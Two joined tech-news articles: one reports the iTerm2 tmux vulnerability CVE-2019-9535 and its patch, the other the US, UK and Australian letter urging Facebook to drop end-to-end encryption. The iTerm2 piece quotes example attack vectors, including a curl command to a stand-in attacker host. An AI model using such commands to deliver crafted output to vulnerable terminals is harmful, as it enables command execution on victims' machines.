Yesterday, Mozilla announced that a critical security vulnerability is present in the terminal multiplexer (tmux) integration feature in all the versions of iTerm2, the GPL-licensed terminal emulator for macOS. The security vulnerability was found by a sponsored security audit conducted by the Mozilla Open Source Support Program (MOSS) which delivers security audits for open source technologies. Mozilla and the iTerm2’s developer George Nachman have together developed and released a patch for the vulnerability in the iTerm2 version 3.3.6. Read Also: MacOS terminal emulator, iTerm2 3.3.0 is here with new Python scripting API, a scriptable status bar, Minimal theme, and more According to the official blog post, MOSS sponsored the iTerm2 security audit due to its popularity among developers and system administrators. Another major reason was the iTerm2’s processing of untrusted data. Radically Open Security (ROS), the firm that conducted the audit, has ascertained that this vulnerability was present in iTerm2 for the last 7 years. An attacker can exploit this vulnerability (CVE-2019-9535) by producing a malicious output to the terminal using commands on the targeted user’s computer or by remotely executing arbitrary commands with the privileges of the targeted user. Tom Ritter of Mozilla says, “Example attack vectors for this would be connecting to an attacker-controlled SSH server or commands like curl http://attacker.com and tail -f /var/log/apache2/referer_log. We expect the community will find many more creative examples.” Nachman says that this is a serious vulnerability because “in some circumstances, it could allow an attacker to execute commands on your machine when you view a file or otherwise receive input they have crafted in iTerm2.” He also strongly recommended all the users to upgrade their iTerm2 to the latest 3.3.6 version. The CERT Coordination Center has pointed out that since the tmux integration cannot be disabled through configuration, the complete resolution to this vulnerability is not yet available. Users have appreciated both Mozilla and the iTerm2 team for the security update. A user commented on Hacker News, “I checked for update, installed and relaunched... and found that all my tabs were exactly as they were before, including my tab that had an ssh tunnel running. The only thing that changed was that iTerm got more secure. Impressive work, Nachman.” Another user says, “Thank you, Mozilla. =)” Visit the Mozilla blog for more details about the vulnerability. Apple’s MacOS Catalina in major turmoil as it kills iTunes and drops support for 32 bit applications Apple iPadOS now available for download with Slide Over and Split View, Home Screen updates, new capabilities to Apple Pencil and more Apple releases Safari 13 with opt-in dark mode support, FIDO2-compliant USB security keys support, and more! The US, UK, and Australian governments call Facebook’s end-to-end encryption plan a hindrance to investigating crimes An unpatched security issue in the Kubernetes API is vulnerable to a “billion laughs” attack

Last week, the US, UK, and Australian governments wrote an open letter to Facebook urging it to drop end-to-end encryption from WhatsApp and halt its plans to implement end-to-end encryption across its other messaging platforms. The three governments asked the company to ensure “there is no reduction to user safety” and include “a means for lawful access to the content of communications to protect our citizens.” The open letter is addressed to Mark Zuckerberg, Facebook’s CEO and co-signed by US Attorney General William Barr, Acting Homeland Security Secretary Kevin McAleenan, United Kingdom Home Secretary Priti Patel, and Australia’s Minister for Home Affairs Peter Dutton. This open letter to Facebook comes after the launch of a new “UK-US Bilateral Data Access Agreement.” This agreement aims to speed up electronic data access requests by their respective law enforcement agencies. This replaces the current process called Mutual Legal Assistance that requires law enforcement agencies to submit a request and get it approved by central governments, which can often take months or even years. The new process will only take a few weeks or even days. Why the US, UK, and Australian governments are against end-to-end encryption The three governments stated that though they realize the importance of strong encryption in processing services such as banking and commerce, end-to-end encryption would hinder the investigation of serious crimes. The letter reads, “We must find a way to balance the need to secure data with public safety and the need for law enforcement to access the information they need to safeguard the public, investigate crimes, and prevent future criminal activity.” The letter does praise Facebook of reporting 16.8 million cases to the US National Center for Missing & Exploited Children (NCMEC), which was more than 90% of the 18.4 million total reports in 2018. It further states that Facebook’s own safety systems were able to identify the 99% of the content Facebook takes action against, both for child sexual exploitation and terrorism. However, the governments believe that “the mere numbers cannot capture the significance of the harm to children.” This is not the first time government officials have shown their dislike with end-to-end encryption. In 2017, Amber Rudd, the UK's home secretary said after WhatsApp added end-to-end encryption, “We need to make sure that organizations like WhatsApp, and there are plenty of others like that, don't provide a secret place for terrorists to communicate with each other.” In December 2018, the Australian government passed a controversial anti-encryption law that allows law enforcement agencies to compel tech companies to hand over encrypted messaging data. Read also: “Five Eyes” call for backdoor access to end-to-end encryption to tackle ‘emerging threats’ despite warnings from cybersecurity and civil rights communities The government has listed the following steps for Facebook and other similar companies: The system should be designed in such a way that the companies behind them are able to effectively act against any illegal content without hampering the safety of others. Allow law enforcement to get lawful access to content in a readable and usable format. Engage in consultation with governments and let those consultations influence companies’ design decisions. The proposed changes should not be implemented until the safety of users is fully ensured by tested and operational systems. What privacy experts and users think about this open letter to Facebook Electronic Frontier Foundation (EFF), a non-profit that supports civil liberties and other legal issues pertaining to digital rights, called this act a “staggering attempt to undermine the security and privacy of communications tools used by billions of people." It said, "Facebook should not comply.” The organization further said that the three governments failed to take into account the “severe risks” associated with introducing backdoors. https://twitter.com/EFF/status/1180978792052998145 The open letter to Facebook also did not sit well with several users. In a discussion on Hacker News users expressed that it would be wrong to undermine the security for millions of law-abiding users in order to investigate the wrongdoers. A user commented, “Privacy isn't a trade-off against security, it's a necessary component of having security.” Another user added, “Criminal activities are exacerbated by the internet it would be a lie to say no. But just like with cars, scooters, or any tech that's sufficiently democratized. They need a permit for a car? Why not just steal it? I need an identity to do shady stuff on the internet? Why not steal it? We cannot reason with malevolent forces, there is always going to be away. And by that time, we compiled the data of everyone, centralized it all, and let govs that don't understand the implication collect those as if it was mere petrol or gold. We are putting everyone's lives at risk doing so, just wait until it leaks out or it starts getting sold. (ahem, oh wait !)” Read the open letter to Facebook for more details. DoorDash data breach leaks personal details of 4.9 million customers, workers, and merchants Google Project Zero discloses a zero-day Android exploit in Pixel, Huawei, Xiaomi and Samsung devices How has ethical hacking benefited the software industry Cryptographic key of Facebook’s Free Basics app has been compromised Facebook must face privacy class action lawsuit, loses facial recognition appeal, U.S. Court of Appeals rules